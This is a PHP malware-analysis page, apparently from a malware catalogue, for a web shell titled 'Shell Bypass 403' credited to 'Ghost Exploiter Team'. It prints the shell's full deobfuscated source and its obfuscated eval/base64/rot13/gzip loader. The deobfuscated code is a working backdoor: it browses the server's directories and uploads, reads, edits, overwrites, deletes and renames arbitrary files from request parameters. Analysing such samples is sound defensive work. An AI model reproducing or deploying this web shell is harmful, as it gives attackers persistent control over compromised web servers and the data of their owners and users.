PHP Malware Analysis

Back to list

Filename: 4033.PHp

Tags

URLs
Title
  • Shell Bypass 403 GE-C666C
Input
  • _GET
  • _POST
  • _FILES
Environment
  • getcwd
Files
  • file_get_contents
  • move_uploaded_file

Deobfuscated code

<?php

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor
$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";
$ghost = "=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";
eval /* PHPDeobfuscator eval output */ {
    ?><!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->

<?php 
    php;
    ?>
<!DOCTYPE html>
<html>
<head>
	<title>Shell Bypass 403 GE-C666C</title>
	<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> 
</head>
<style>
	* {
		font-family: cursive;
		color: #000;
		font-family: 'Cuprum', sans-serif;
	}

	body {
		background-repeat: no-repeat;
		background-attachment:fixed;
		background-size: 100% 1700px;
	}
	body h1{
		color: #A52A2A;
		text-shadow: 2px 2px 2px #000;
		font-size: 50px;
	}
	.dir {
		text-align: center;
		font-size: 30px;
	}
	.dir a{
		text-decoration: none;
		color: #48D1CC;
		text-shadow: 1px 1px 1px #000;

	}
	.dir a:hover{
		text-decoration: none;
		color: red;
	}
	table {
		margin: 12px auto;
		height: 100%;
		border-collapse: collapse;
		font-size: 30px;
	}
	table,th {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: 3px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 2px 2px;
		color: #F0E68C;
		text-shadow: 1px 1px 1px #000;
	}
	table,td {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: .5px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 8px 8px;
		color: red;
	}
	table,td a {
		text-decoration: none;
		color:#8A2BE2;
		text-shadow: 1px 1px 1px #000;
	}
	table,td a:hover {
		text-decoration: none;
		color: red;
	}
	.button1 {
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: #000;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1 a{
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: red;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1:hover {
		text-shadow: 0px 0px 5px #fff;
		box-shadow: .5px .5px .3px .3px #555;
		text-decoration: none;
	}
	textarea {
		border: 1px solid green;
		border-radius: 5px;
		box-shadow: 1px 1px 1px 1px #fff;
		width: 100%;
		height: 400px;
		padding-left: 10px;
		margin: 10px auto;
		resize: none;
		background: green;
		color: #ffffff;
		font-family: 'Cuprum', sans-serif;
		font-size: 13px;
	}
</style>
<body>
	<center><h1>Ghost Exploiter Team Official</h1></center>
  <div class="dir">
	<?php 
    if (isset($_GET['dir'])) {
        $dir = $_GET['dir'];
    } else {
        $dir = getcwd();
    }
    $dir = str_replace("\\", "/", $dir);
    $dirs = explode("/", $dir);
    foreach ($dirs as $key => $value) {
        if ($value == "" && $key == 0) {
            echo "<a href=\"/\">/</a>";
            continue;
        }
        echo "<a href=\"?dir=";
        for ($i = 0; $i <= $key; $i++) {
            echo "{$dirs[$i]}";
            if ($key !== $i) {
                echo "/";
            }
        }
        echo '">' . $value . '</a>/';
    }
    if (isset($_POST['submit'])) {
        $namafile = $_FILES['upload']['name'];
        $tempatfile = $_FILES['upload']['tmp_name'];
        $tempat = $_GET['dir'];
        $error = $_FILES['upload']['error'];
        $ukuranfile = $_FILES['upload']['size'];
        move_uploaded_file($tempatfile, $dir . '/' . $namafile);
        echo "\r\n\t\t\t\t\t<script>alert('diupload!!!');</script>\r\n\t\t\t\t\t";
    }
    ?>

	<form method="post" enctype="multipart/form-data">
		<input type="file" name="upload">
		<input type="submit" name="submit" value="Upload">
		
	</form>

  </div>
<table>
	<tr>
		<th>Nama File / Folder</th>
		<th>Size</th>
		<th>Action</th>
	</tr>
	<?php 
    $scan = scandir($dir);
    foreach ($scan as $directory) {
        if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
            continue;
        }
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '/' . $directory . '">' . $directory . '</a></td>
	<td>--</td>
	<td>NONE</td>
	</tr>
	';
    }
    foreach ($scan as $file) {
        if (!is_file($dir . '/' . $file)) {
            continue;
        }
        $jumlah = filesize($dir . '/' . $file) / 1024;
        $jumlah = round($jumlah, 3);
        if ($jumlah >= 1024) {
            $jumlah = round($jumlah / 1024, 2) . 'MB';
        } else {
            $jumlah .= 'KB';
        }
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '&open=' . $dir . '/' . $file . '">' . $file . '</a></td>
	<td>' . $jumlah . '</td>
	<td>
	<a href="?dir=' . $dir . '&delete=' . $dir . '/' . $file . '" class="button1">Hapus</a>
	<a href="?dir=' . $dir . '&ubah=' . $dir . '/' . $file . '" class="button1">Edit</a>
	<a href="?dir=' . $dir . '&rename=' . $dir . '/' . $file . '&nama=' . $file . '" class="button1">Rename</a>
	</td>
	</tr>
	';
    }
    if (isset($_GET['open'])) {
        echo '
	<br />
	<style>
		table {
			display: none;
		}
	</style>
	<textarea>' . htmlspecialchars(file_get_contents($_GET['open'])) . '</textarea>
	';
    }
    if (isset($_GET['delete'])) {
        if (unlink($_GET['delete'])) {
            echo "<script>alert('dihapus');window.location='?dir=" . $dir . "';</script>";
        }
    }
    if (isset($_GET['ubah'])) {
        echo '

		<style>
			table {
				display: none;
			}
		</style>

		<a href="?dir=' . $dir . '" class="button1"><=Back</a>
		<form method="post" action="">
		<input type="hidden" name="object" value="' . $_GET['ubah'] . '">
		<textarea name="edit">' . htmlspecialchars(file_get_contents($_GET['ubah'])) . '</textarea>
		<center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center>
		</form>

		';
    }
    if (isset($_POST['edit'])) {
        $data = fopen($_POST["object"], 'w');
        if (fwrite($data, $_POST['edit'])) {
            echo '
			<script>alert("Berhasil diedit!!!");window.location="?dir=' . $dir . '";</script>						
			';
        } else {
            echo "\r\n\t\t\t<script>alert('gagal');</script>\t\t\t\t\t\r\n\t\t\t";
        }
    }
    if ($_GET['rename']) {
        if (isset($_POST['newname'])) {
            if (rename($_GET['rename'], $_GET['dir'] . '/' . $_POST['newname'])) {
                echo "<font color=\"green\">Ganti Nama Berhasil</font><br/>";
                echo "<script>window.location='?dir=" . $dir . "';</script>";
            } else {
                echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
            }
        }
        echo '<br><center><form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_GET['nama'] . '" />
<input type="hidden" name="path" value="' . $_GET['dir'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form></center>';
    }
    ?>
</table>
</body>
</html><?php 
};
exit;


Original code

<?php

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor

$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";$ghost = "=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";

eval(gzuncompress(str_rot13(base64_decode($code))));
exit;
?>